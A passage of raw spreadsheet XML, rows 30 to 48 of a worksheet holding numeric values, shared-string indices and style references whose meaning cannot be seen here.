      </c>
      <c r="I30" s="6">
        <v>1590.0</v>
      </c>
      <c r="J30" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K30" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L30" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M30" s="13" t="s">
        <v>121</v>
      </c>
      <c r="N30" s="13" t="s">
        <v>122</v>
      </c>
      <c r="O30" s="4" t="s">
        <v>148</v>
      </c>
      <c r="P30" s="4" t="s">
        <v>149</v>
      </c>
      <c r="Q30" s="6">
        <v>1500107.0</v>
      </c>
      <c r="R30" s="8"/>
      <c r="S30" s="6">
        <v>5168.0</v>
      </c>
      <c r="T30" s="8"/>
      <c r="U30" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V30" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W30" s="2" t="s">
        <v>150</v>
      </c>
      <c r="X30" s="6">
        <v>2.0</v>
      </c>
      <c r="Y30" s="6">
        <v>0.0</v>
      </c>
      <c r="Z30" s="6">
        <v>0.0</v>
      </c>
      <c r="AA30" s="8"/>
      <c r="AB30" s="8"/>
      <c r="AC30" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE30" s="8"/>
      <c r="AF30" s="14"/>
    </row>
    <row r="31">
      <c r="A31" s="6">
        <f t="shared" si="1"/>
        <v>0.1873254506</v>
      </c>
      <c r="B31" s="6">
        <v>1.7400947E7</v>
      </c>
      <c r="C31" s="6">
        <v>1.0</v>
      </c>
      <c r="D31" s="7"/>
      <c r="E31" s="8"/>
      <c r="F31" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G31" s="8"/>
      <c r="H31" s="6">
        <v>0.0</v>
      </c>
      <c r="I31" s="6">
        <v>584.0</v>
      </c>
      <c r="J31" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K31" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L31" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M31" s="13" t="s">
        <v>121</v>
      </c>
      <c r="N31" s="13" t="s">
        <v>122</v>
      </c>
      <c r="O31" s="4" t="s">
        <v>151</v>
      </c>
      <c r="P31" s="4" t="s">
        <v>152</v>
      </c>
      <c r="Q31" s="6">
        <v>270433.0</v>
      </c>
      <c r="R31" s="7"/>
      <c r="S31" s="6">
        <v>-1.0</v>
      </c>
      <c r="T31" s="7"/>
      <c r="U31" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V31" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W31" s="2" t="s">
        <v>153</v>
      </c>
      <c r="X31" s="6">
        <v>0.0</v>
      </c>
      <c r="Y31" s="6">
        <v>2.0</v>
      </c>
      <c r="Z31" s="7"/>
      <c r="AA31" s="7"/>
      <c r="AB31" s="7"/>
      <c r="AC31" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE31" s="8"/>
      <c r="AF31" s="15"/>
    </row>
    <row r="32">
      <c r="A32" s="6">
        <f t="shared" si="1"/>
        <v>0.5080937758</v>
      </c>
      <c r="B32" s="6">
        <v>4.6844957E7</v>
      </c>
      <c r="C32" s="6">
        <v>1.0</v>
      </c>
      <c r="D32" s="7"/>
      <c r="E32" s="8"/>
      <c r="F32" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G32" s="8"/>
      <c r="H32" s="6">
        <v>0.0</v>
      </c>
      <c r="I32" s="6">
        <v>1245.0</v>
      </c>
      <c r="J32" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K32" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L32" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M32" s="13" t="s">
        <v>121</v>
      </c>
      <c r="N32" s="13" t="s">
        <v>126</v>
      </c>
      <c r="O32" s="4" t="s">
        <v>154</v>
      </c>
      <c r="P32" s="4" t="s">
        <v>155</v>
      </c>
      <c r="Q32" s="6">
        <v>2295029.0</v>
      </c>
      <c r="R32" s="7"/>
      <c r="S32" s="7"/>
      <c r="T32" s="7"/>
      <c r="U32" s="8"/>
      <c r="V32" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W32" s="2" t="s">
        <v>156</v>
      </c>
      <c r="X32" s="6">
        <v>1.0</v>
      </c>
      <c r="Y32" s="6">
        <v>0.0</v>
      </c>
      <c r="Z32" s="7"/>
      <c r="AA32" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB32" s="7"/>
      <c r="AC32" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE32" s="8"/>
      <c r="AF32" s="15"/>
    </row>
    <row r="33">
      <c r="A33" s="6">
        <f t="shared" si="1"/>
        <v>0.7075271737</v>
      </c>
      <c r="B33" s="6">
        <v>1.5985154E7</v>
      </c>
      <c r="C33" s="6">
        <v>1.0</v>
      </c>
      <c r="D33" s="6">
        <v>1.6008095E7</v>
      </c>
      <c r="E33" s="8"/>
      <c r="F33" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G33" s="8"/>
      <c r="H33" s="6">
        <v>1.0</v>
      </c>
      <c r="I33" s="6">
        <v>850.0</v>
      </c>
      <c r="J33" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K33" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L33" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M33" s="13" t="s">
        <v>121</v>
      </c>
      <c r="N33" s="13" t="s">
        <v>126</v>
      </c>
      <c r="O33" s="4" t="s">
        <v>157</v>
      </c>
      <c r="P33" s="4" t="s">
        <v>158</v>
      </c>
      <c r="Q33" s="6">
        <v>1512886.0</v>
      </c>
      <c r="R33" s="8"/>
      <c r="S33" s="6">
        <v>1512886.0</v>
      </c>
      <c r="T33" s="8"/>
      <c r="U33" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V33" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W33" s="2" t="s">
        <v>159</v>
      </c>
      <c r="X33" s="6">
        <v>1.0</v>
      </c>
      <c r="Y33" s="6">
        <v>6.0</v>
      </c>
      <c r="Z33" s="8"/>
      <c r="AA33" s="8"/>
      <c r="AB33" s="8"/>
      <c r="AC33" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE33" s="8"/>
      <c r="AF33" s="14"/>
    </row>
    <row r="34">
      <c r="A34" s="6">
        <f t="shared" si="1"/>
        <v>0.2554532628</v>
      </c>
      <c r="B34" s="6">
        <v>5.2600113E7</v>
      </c>
      <c r="C34" s="6">
        <v>1.0</v>
      </c>
      <c r="D34" s="7"/>
      <c r="E34" s="8"/>
      <c r="F34" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G34" s="8"/>
      <c r="H34" s="6">
        <v>0.0</v>
      </c>
      <c r="I34" s="6">
        <v>1231.0</v>
      </c>
      <c r="J34" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K34" s="13" t="s">
        <v>121</v>
      </c>
      <c r="L34" s="10" t="s">
        <v>160</v>
      </c>
      <c r="M34" s="13" t="s">
        <v>161</v>
      </c>
      <c r="N34" s="17"/>
      <c r="O34" s="4" t="s">
        <v>162</v>
      </c>
      <c r="P34" s="4" t="s">
        <v>163</v>
      </c>
      <c r="Q34" s="6">
        <v>4259125.0</v>
      </c>
      <c r="R34" s="7"/>
      <c r="S34" s="6">
        <v>4259125.0</v>
      </c>
      <c r="T34" s="7"/>
      <c r="U34" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V34" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W34" s="2" t="s">
        <v>164</v>
      </c>
      <c r="X34" s="6">
        <v>0.0</v>
      </c>
      <c r="Y34" s="6">
        <v>5.0</v>
      </c>
      <c r="Z34" s="7"/>
      <c r="AA34" s="7"/>
      <c r="AB34" s="7"/>
      <c r="AC34" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE34" s="8"/>
      <c r="AF34" s="15"/>
    </row>
    <row r="35">
      <c r="A35" s="6">
        <f t="shared" si="1"/>
        <v>0.585803361</v>
      </c>
      <c r="B35" s="6">
        <v>7.535242E7</v>
      </c>
      <c r="C35" s="6">
        <v>1.0</v>
      </c>
      <c r="D35" s="8"/>
      <c r="E35" s="8"/>
      <c r="F35" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G35" s="8"/>
      <c r="H35" s="6">
        <v>0.0</v>
      </c>
      <c r="I35" s="6">
        <v>12.0</v>
      </c>
      <c r="J35" s="3" t="s">
        <v>121</v>
      </c>
      <c r="K35" s="3" t="s">
        <v>56</v>
      </c>
      <c r="L35" s="3" t="s">
        <v>165</v>
      </c>
      <c r="M35" s="10" t="s">
        <v>121</v>
      </c>
      <c r="N35" s="13" t="s">
        <v>122</v>
      </c>
      <c r="O35" s="4" t="s">
        <v>166</v>
      </c>
      <c r="P35" s="4" t="s">
        <v>167</v>
      </c>
      <c r="Q35" s="6">
        <v>1.5313072E7</v>
      </c>
      <c r="R35" s="8"/>
      <c r="S35" s="8"/>
      <c r="T35" s="8"/>
      <c r="U35" s="8"/>
      <c r="V35" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W35" s="2" t="s">
        <v>168</v>
      </c>
      <c r="X35" s="6">
        <v>0.0</v>
      </c>
      <c r="Y35" s="6">
        <v>0.0</v>
      </c>
      <c r="Z35" s="8"/>
      <c r="AA35" s="8"/>
      <c r="AB35" s="8"/>
      <c r="AC35" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AD35" s="12"/>
      <c r="AE35" s="12"/>
      <c r="AF35" s="5"/>
    </row>
    <row r="36">
      <c r="A36" s="6">
        <f t="shared" si="1"/>
        <v>0.8544465605</v>
      </c>
      <c r="B36" s="6">
        <v>1.4924035E7</v>
      </c>
      <c r="C36" s="6">
        <v>1.0</v>
      </c>
      <c r="D36" s="7"/>
      <c r="E36" s="8"/>
      <c r="F36" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G36" s="8"/>
      <c r="H36" s="6">
        <v>0.0</v>
      </c>
      <c r="I36" s="6">
        <v>288.0</v>
      </c>
      <c r="J36" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K36" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L36" s="10" t="s">
        <v>160</v>
      </c>
      <c r="M36" s="13" t="s">
        <v>121</v>
      </c>
      <c r="N36" s="13" t="s">
        <v>169</v>
      </c>
      <c r="O36" s="4" t="s">
        <v>170</v>
      </c>
      <c r="P36" s="4" t="s">
        <v>171</v>
      </c>
      <c r="Q36" s="6">
        <v>793454.0</v>
      </c>
      <c r="R36" s="7"/>
      <c r="S36" s="7"/>
      <c r="T36" s="7"/>
      <c r="U36" s="8"/>
      <c r="V36" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W36" s="2" t="s">
        <v>172</v>
      </c>
      <c r="X36" s="6">
        <v>0.0</v>
      </c>
      <c r="Y36" s="6">
        <v>3.0</v>
      </c>
      <c r="Z36" s="7"/>
      <c r="AA36" s="7"/>
      <c r="AB36" s="7"/>
      <c r="AC36" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE36" s="8"/>
      <c r="AF36" s="15"/>
    </row>
    <row r="37">
      <c r="A37" s="6">
        <f t="shared" si="1"/>
        <v>0.08266695146</v>
      </c>
      <c r="B37" s="6">
        <v>3.5318921E7</v>
      </c>
      <c r="C37" s="6">
        <v>1.0</v>
      </c>
      <c r="D37" s="6">
        <v>3.5319164E7</v>
      </c>
      <c r="E37" s="8"/>
      <c r="F37" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G37" s="8"/>
      <c r="H37" s="6">
        <v>3.0</v>
      </c>
      <c r="I37" s="6">
        <v>133.0</v>
      </c>
      <c r="J37" s="13" t="s">
        <v>121</v>
      </c>
      <c r="K37" s="13" t="s">
        <v>173</v>
      </c>
      <c r="L37" s="10" t="s">
        <v>121</v>
      </c>
      <c r="M37" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N37" s="13" t="s">
        <v>0</v>
      </c>
      <c r="O37" s="4" t="s">
        <v>174</v>
      </c>
      <c r="P37" s="4" t="s">
        <v>175</v>
      </c>
      <c r="Q37" s="6">
        <v>380666.0</v>
      </c>
      <c r="R37" s="8"/>
      <c r="S37" s="6">
        <v>380666.0</v>
      </c>
      <c r="T37" s="8"/>
      <c r="U37" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V37" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W37" s="2" t="s">
        <v>176</v>
      </c>
      <c r="X37" s="6">
        <v>1.0</v>
      </c>
      <c r="Y37" s="6">
        <v>1.0</v>
      </c>
      <c r="Z37" s="8"/>
      <c r="AA37" s="8"/>
      <c r="AB37" s="8"/>
      <c r="AC37" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE37" s="8"/>
      <c r="AF37" s="14"/>
    </row>
    <row r="38">
      <c r="A38" s="6">
        <f t="shared" si="1"/>
        <v>0.502080177</v>
      </c>
      <c r="B38" s="6">
        <v>6.8115546E7</v>
      </c>
      <c r="C38" s="6">
        <v>1.0</v>
      </c>
      <c r="D38" s="6">
        <v>6.8444935E7</v>
      </c>
      <c r="E38" s="8"/>
      <c r="F38" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G38" s="8"/>
      <c r="H38" s="6">
        <v>0.0</v>
      </c>
      <c r="I38" s="6">
        <v>699.0</v>
      </c>
      <c r="J38" s="13" t="s">
        <v>177</v>
      </c>
      <c r="K38" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L38" s="10" t="s">
        <v>160</v>
      </c>
      <c r="M38" s="13" t="s">
        <v>177</v>
      </c>
      <c r="N38" s="13" t="s">
        <v>178</v>
      </c>
      <c r="O38" s="4" t="s">
        <v>179</v>
      </c>
      <c r="P38" s="4" t="s">
        <v>180</v>
      </c>
      <c r="Q38" s="6">
        <v>1.1646401E7</v>
      </c>
      <c r="R38" s="8"/>
      <c r="S38" s="6">
        <v>1.1646401E7</v>
      </c>
      <c r="T38" s="8"/>
      <c r="U38" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V38" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W38" s="2" t="s">
        <v>181</v>
      </c>
      <c r="X38" s="6">
        <v>1.0</v>
      </c>
      <c r="Y38" s="6">
        <v>6.0</v>
      </c>
      <c r="Z38" s="8"/>
      <c r="AA38" s="8"/>
      <c r="AB38" s="8"/>
      <c r="AC38" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE38" s="8"/>
      <c r="AF38" s="14"/>
    </row>
    <row r="39">
      <c r="A39" s="6">
        <f t="shared" si="1"/>
        <v>0.03720485825</v>
      </c>
      <c r="B39" s="6">
        <v>6.8474503E7</v>
      </c>
      <c r="C39" s="6">
        <v>1.0</v>
      </c>
      <c r="D39" s="6">
        <v>6.8476149E7</v>
      </c>
      <c r="E39" s="8"/>
      <c r="F39" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G39" s="8"/>
      <c r="H39" s="6">
        <v>1.0</v>
      </c>
      <c r="I39" s="6">
        <v>1461.0</v>
      </c>
      <c r="J39" s="13" t="s">
        <v>177</v>
      </c>
      <c r="K39" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L39" s="10" t="s">
        <v>160</v>
      </c>
      <c r="M39" s="13" t="s">
        <v>177</v>
      </c>
      <c r="N39" s="17"/>
      <c r="O39" s="4" t="s">
        <v>182</v>
      </c>
      <c r="P39" s="4" t="s">
        <v>183</v>
      </c>
      <c r="Q39" s="6">
        <v>9135863.0</v>
      </c>
      <c r="R39" s="7"/>
      <c r="S39" s="6">
        <v>9135863.0</v>
      </c>
      <c r="T39" s="7"/>
      <c r="U39" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V39" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W39" s="2" t="s">
        <v>184</v>
      </c>
      <c r="X39" s="6">
        <v>1.0</v>
      </c>
      <c r="Y39" s="6">
        <v>3.0</v>
      </c>
      <c r="Z39" s="7"/>
      <c r="AA39" s="7"/>
      <c r="AB39" s="7"/>
      <c r="AC39" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE39" s="8"/>
      <c r="AF39" s="15"/>
    </row>
    <row r="40">
      <c r="A40" s="6">
        <f t="shared" si="1"/>
        <v>0.1246214636</v>
      </c>
      <c r="B40" s="6">
        <v>7.3408296E7</v>
      </c>
      <c r="C40" s="6">
        <v>1.0</v>
      </c>
      <c r="D40" s="8"/>
      <c r="E40" s="8"/>
      <c r="F40" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G40" s="8"/>
      <c r="H40" s="6">
        <v>0.0</v>
      </c>
      <c r="I40" s="6">
        <v>110.0</v>
      </c>
      <c r="J40" s="13" t="s">
        <v>185</v>
      </c>
      <c r="K40" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L40" s="10" t="s">
        <v>185</v>
      </c>
      <c r="M40" s="13" t="s">
        <v>185</v>
      </c>
      <c r="N40" s="13" t="s">
        <v>186</v>
      </c>
      <c r="O40" s="4" t="s">
        <v>187</v>
      </c>
      <c r="P40" s="4" t="s">
        <v>188</v>
      </c>
      <c r="Q40" s="6">
        <v>1.9789092E7</v>
      </c>
      <c r="R40" s="8"/>
      <c r="S40" s="8"/>
      <c r="T40" s="8"/>
      <c r="U40" s="8"/>
      <c r="V40" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W40" s="2" t="s">
        <v>189</v>
      </c>
      <c r="X40" s="6">
        <v>0.0</v>
      </c>
      <c r="Y40" s="6">
        <v>2.0</v>
      </c>
      <c r="Z40" s="8"/>
      <c r="AA40" s="8"/>
      <c r="AB40" s="8"/>
      <c r="AC40" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE40" s="8"/>
      <c r="AF40" s="14"/>
    </row>
    <row r="41">
      <c r="A41" s="6">
        <f t="shared" si="1"/>
        <v>0.3003619386</v>
      </c>
      <c r="B41" s="6">
        <v>5.8419403E7</v>
      </c>
      <c r="C41" s="6">
        <v>1.0</v>
      </c>
      <c r="D41" s="8"/>
      <c r="E41" s="8"/>
      <c r="F41" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G41" s="8"/>
      <c r="H41" s="6">
        <v>2.0</v>
      </c>
      <c r="I41" s="6">
        <v>3075.0</v>
      </c>
      <c r="J41" s="13" t="s">
        <v>185</v>
      </c>
      <c r="K41" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L41" s="10" t="s">
        <v>185</v>
      </c>
      <c r="M41" s="13" t="s">
        <v>185</v>
      </c>
      <c r="N41" s="13" t="s">
        <v>190</v>
      </c>
      <c r="O41" s="4" t="s">
        <v>191</v>
      </c>
      <c r="P41" s="4" t="s">
        <v>192</v>
      </c>
      <c r="Q41" s="6">
        <v>6870116.0</v>
      </c>
      <c r="R41" s="7"/>
      <c r="S41" s="6">
        <v>174777.0</v>
      </c>
      <c r="T41" s="7"/>
      <c r="U41" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V41" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W41" s="2" t="s">
        <v>193</v>
      </c>
      <c r="X41" s="6">
        <v>2.0</v>
      </c>
      <c r="Y41" s="6">
        <v>2.0</v>
      </c>
      <c r="Z41" s="6">
        <v>0.0</v>
      </c>
      <c r="AA41" s="7"/>
      <c r="AB41" s="7"/>
      <c r="AC41" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE41" s="8"/>
      <c r="AF41" s="15"/>
    </row>
    <row r="42">
      <c r="A42" s="6">
        <f t="shared" si="1"/>
        <v>0.006936251406</v>
      </c>
      <c r="B42" s="6">
        <v>3.2612251E7</v>
      </c>
      <c r="C42" s="6">
        <v>1.0</v>
      </c>
      <c r="D42" s="6">
        <v>3.2615058E7</v>
      </c>
      <c r="E42" s="8"/>
      <c r="F42" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G42" s="8"/>
      <c r="H42" s="6">
        <v>2.0</v>
      </c>
      <c r="I42" s="6">
        <v>301.0</v>
      </c>
      <c r="J42" s="13" t="s">
        <v>185</v>
      </c>
      <c r="K42" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L42" s="10" t="s">
        <v>185</v>
      </c>
      <c r="M42" s="13" t="s">
        <v>185</v>
      </c>
      <c r="N42" s="13" t="s">
        <v>194</v>
      </c>
      <c r="O42" s="4" t="s">
        <v>195</v>
      </c>
      <c r="P42" s="4" t="s">
        <v>196</v>
      </c>
      <c r="Q42" s="6">
        <v>327789.0</v>
      </c>
      <c r="R42" s="7"/>
      <c r="S42" s="7"/>
      <c r="T42" s="7"/>
      <c r="U42" s="7"/>
      <c r="V42" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W42" s="2" t="s">
        <v>197</v>
      </c>
      <c r="X42" s="6">
        <v>1.0</v>
      </c>
      <c r="Y42" s="6">
        <v>4.0</v>
      </c>
      <c r="Z42" s="7"/>
      <c r="AA42" s="7"/>
      <c r="AB42" s="7"/>
      <c r="AC42" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE42" s="8"/>
      <c r="AF42" s="15"/>
    </row>
    <row r="43">
      <c r="A43" s="6">
        <f t="shared" si="1"/>
        <v>0.3316612034</v>
      </c>
      <c r="B43" s="6">
        <v>1.2234157E7</v>
      </c>
      <c r="C43" s="6">
        <v>1.0</v>
      </c>
      <c r="D43" s="8"/>
      <c r="E43" s="8"/>
      <c r="F43" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G43" s="8"/>
      <c r="H43" s="6">
        <v>1.0</v>
      </c>
      <c r="I43" s="6">
        <v>113.0</v>
      </c>
      <c r="J43" s="3" t="s">
        <v>198</v>
      </c>
      <c r="K43" s="3" t="s">
        <v>56</v>
      </c>
      <c r="L43" s="3" t="s">
        <v>160</v>
      </c>
      <c r="M43" s="13" t="s">
        <v>198</v>
      </c>
      <c r="N43" s="21" t="s">
        <v>199</v>
      </c>
      <c r="O43" s="4" t="s">
        <v>200</v>
      </c>
      <c r="P43" s="4" t="s">
        <v>201</v>
      </c>
      <c r="Q43" s="6">
        <v>1641503.0</v>
      </c>
      <c r="R43" s="8"/>
      <c r="S43" s="6">
        <v>23897.0</v>
      </c>
      <c r="T43" s="8"/>
      <c r="U43" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V43" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W43" s="2" t="s">
        <v>202</v>
      </c>
      <c r="X43" s="6">
        <v>1.0</v>
      </c>
      <c r="Y43" s="6">
        <v>1.0</v>
      </c>
      <c r="Z43" s="8"/>
      <c r="AA43" s="8"/>
      <c r="AB43" s="8"/>
      <c r="AC43" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AD43" s="12"/>
      <c r="AE43" s="12"/>
      <c r="AF43" s="5"/>
    </row>
    <row r="44">
      <c r="A44" s="6">
        <f t="shared" si="1"/>
        <v>0.3233384864</v>
      </c>
      <c r="B44" s="6">
        <v>7.1505747E7</v>
      </c>
      <c r="C44" s="6">
        <v>1.0</v>
      </c>
      <c r="D44" s="8"/>
      <c r="E44" s="8"/>
      <c r="F44" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G44" s="8"/>
      <c r="H44" s="6">
        <v>2.0</v>
      </c>
      <c r="I44" s="6">
        <v>275.0</v>
      </c>
      <c r="J44" s="3" t="s">
        <v>61</v>
      </c>
      <c r="K44" s="3" t="s">
        <v>32</v>
      </c>
      <c r="L44" s="10" t="s">
        <v>61</v>
      </c>
      <c r="M44" s="13" t="s">
        <v>61</v>
      </c>
      <c r="N44" s="10" t="s">
        <v>203</v>
      </c>
      <c r="O44" s="4" t="s">
        <v>204</v>
      </c>
      <c r="P44" s="4" t="s">
        <v>205</v>
      </c>
      <c r="Q44" s="6">
        <v>1.670778E7</v>
      </c>
      <c r="R44" s="8"/>
      <c r="S44" s="8"/>
      <c r="T44" s="8"/>
      <c r="U44" s="8"/>
      <c r="V44" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W44" s="2" t="s">
        <v>206</v>
      </c>
      <c r="X44" s="6">
        <v>2.0</v>
      </c>
      <c r="Y44" s="6">
        <v>0.0</v>
      </c>
      <c r="Z44" s="8"/>
      <c r="AA44" s="8"/>
      <c r="AB44" s="8"/>
      <c r="AC44" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AD44" s="12"/>
      <c r="AE44" s="12"/>
      <c r="AF44" s="5"/>
    </row>
    <row r="45">
      <c r="A45" s="6">
        <f t="shared" si="1"/>
        <v>0.4195827996</v>
      </c>
      <c r="B45" s="6">
        <v>6.4436989E7</v>
      </c>
      <c r="C45" s="6">
        <v>1.0</v>
      </c>
      <c r="D45" s="6">
        <v>6.4500525E7</v>
      </c>
      <c r="E45" s="8"/>
      <c r="F45" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G45" s="8"/>
      <c r="H45" s="6">
        <v>7.0</v>
      </c>
      <c r="I45" s="6">
        <v>399.0</v>
      </c>
      <c r="J45" s="3" t="s">
        <v>160</v>
      </c>
      <c r="K45" s="3" t="s">
        <v>32</v>
      </c>
      <c r="L45" s="3" t="s">
        <v>160</v>
      </c>
      <c r="M45" s="13" t="s">
        <v>207</v>
      </c>
      <c r="N45" s="21" t="s">
        <v>208</v>
      </c>
      <c r="O45" s="4" t="s">
        <v>209</v>
      </c>
      <c r="P45" s="4" t="s">
        <v>210</v>
      </c>
      <c r="Q45" s="6">
        <v>9146833.0</v>
      </c>
      <c r="R45" s="8"/>
      <c r="S45" s="6">
        <v>9146833.0</v>
      </c>
      <c r="T45" s="8"/>
      <c r="U45" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V45" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W45" s="2" t="s">
        <v>211</v>
      </c>
      <c r="X45" s="6">
        <v>2.0</v>
      </c>
      <c r="Y45" s="6">
        <v>2.0</v>
      </c>
      <c r="Z45" s="6">
        <v>0.0</v>
      </c>
      <c r="AA45" s="8"/>
      <c r="AB45" s="8"/>
      <c r="AC45" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AD45" s="12"/>
      <c r="AE45" s="12"/>
      <c r="AF45" s="5"/>
    </row>
    <row r="46">
      <c r="A46" s="6">
        <f t="shared" si="1"/>
        <v>0.5628685916</v>
      </c>
      <c r="B46" s="6">
        <v>2.04878E7</v>
      </c>
      <c r="C46" s="6">
        <v>1.0</v>
      </c>
      <c r="D46" s="6">
        <v>2.0497805E7</v>
      </c>
      <c r="E46" s="8"/>
      <c r="F46" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G46" s="8"/>
      <c r="H46" s="6">
        <v>1.0</v>
      </c>
      <c r="I46" s="6">
        <v>664.0</v>
      </c>
      <c r="J46" s="13" t="s">
        <v>113</v>
      </c>
      <c r="K46" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L46" s="10" t="s">
        <v>113</v>
      </c>
      <c r="M46" s="10" t="s">
        <v>113</v>
      </c>
      <c r="N46" s="22" t="s">
        <v>212</v>
      </c>
      <c r="O46" s="4" t="s">
        <v>213</v>
      </c>
      <c r="P46" s="4" t="s">
        <v>214</v>
      </c>
      <c r="Q46" s="6">
        <v>2524285.0</v>
      </c>
      <c r="R46" s="7"/>
      <c r="S46" s="7"/>
      <c r="T46" s="7"/>
      <c r="U46" s="8"/>
      <c r="V46" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W46" s="2" t="s">
        <v>215</v>
      </c>
      <c r="X46" s="6">
        <v>1.0</v>
      </c>
      <c r="Y46" s="6">
        <v>0.0</v>
      </c>
      <c r="Z46" s="7"/>
      <c r="AA46" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB46" s="7"/>
      <c r="AC46" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE46" s="8"/>
      <c r="AF46" s="15"/>
    </row>
    <row r="47">
      <c r="A47" s="6">
        <f t="shared" si="1"/>
        <v>0.1476628666</v>
      </c>
      <c r="B47" s="6">
        <v>3827125.0</v>
      </c>
      <c r="C47" s="6">
        <v>1.0</v>
      </c>
      <c r="D47" s="6">
        <v>3827332.0</v>
      </c>
      <c r="E47" s="8"/>
      <c r="F47" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G47" s="8"/>
      <c r="H47" s="6">
        <v>8.0</v>
      </c>
      <c r="I47" s="6">
        <v>10635.0</v>
      </c>
      <c r="J47" s="13" t="s">
        <v>113</v>
      </c>
      <c r="K47" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L47" s="10" t="s">
        <v>113</v>
      </c>
      <c r="M47" s="13" t="s">
        <v>113</v>
      </c>
      <c r="N47" s="13" t="s">
        <v>216</v>
      </c>
      <c r="O47" s="4" t="s">
        <v>217</v>
      </c>
      <c r="P47" s="4" t="s">
        <v>218</v>
      </c>
      <c r="Q47" s="6">
        <v>1000000.0</v>
      </c>
      <c r="R47" s="7"/>
      <c r="S47" s="6">
        <v>1000000.0</v>
      </c>
      <c r="T47" s="7"/>
      <c r="U47" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V47" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W47" s="2" t="s">
        <v>219</v>
      </c>
      <c r="X47" s="6">
        <v>7.0</v>
      </c>
      <c r="Y47" s="6">
        <v>11.0</v>
      </c>
      <c r="Z47" s="6">
        <v>0.0</v>
      </c>
      <c r="AA47" s="7"/>
      <c r="AB47" s="7"/>
      <c r="AC47" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE47" s="8"/>
      <c r="AF47" s="15"/>
    </row>
    <row r="48">
      <c r="A48" s="6">
        <f t="shared" si="1"/>
        <v>0.1416028434</v>
      </c>
      <c r="B48" s="6">
        <v>3080896.0</v>
      </c>
      <c r="C48" s="6">
        <v>1.0</v>
      </c>
      <c r="D48" s="6">
        <v>3080963.0</v>
      </c>
      <c r="E48" s="8"/>
      <c r="F48" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G48" s="8"/>
      <c r="H48" s="6">
        <v>6.0</v>
      </c>
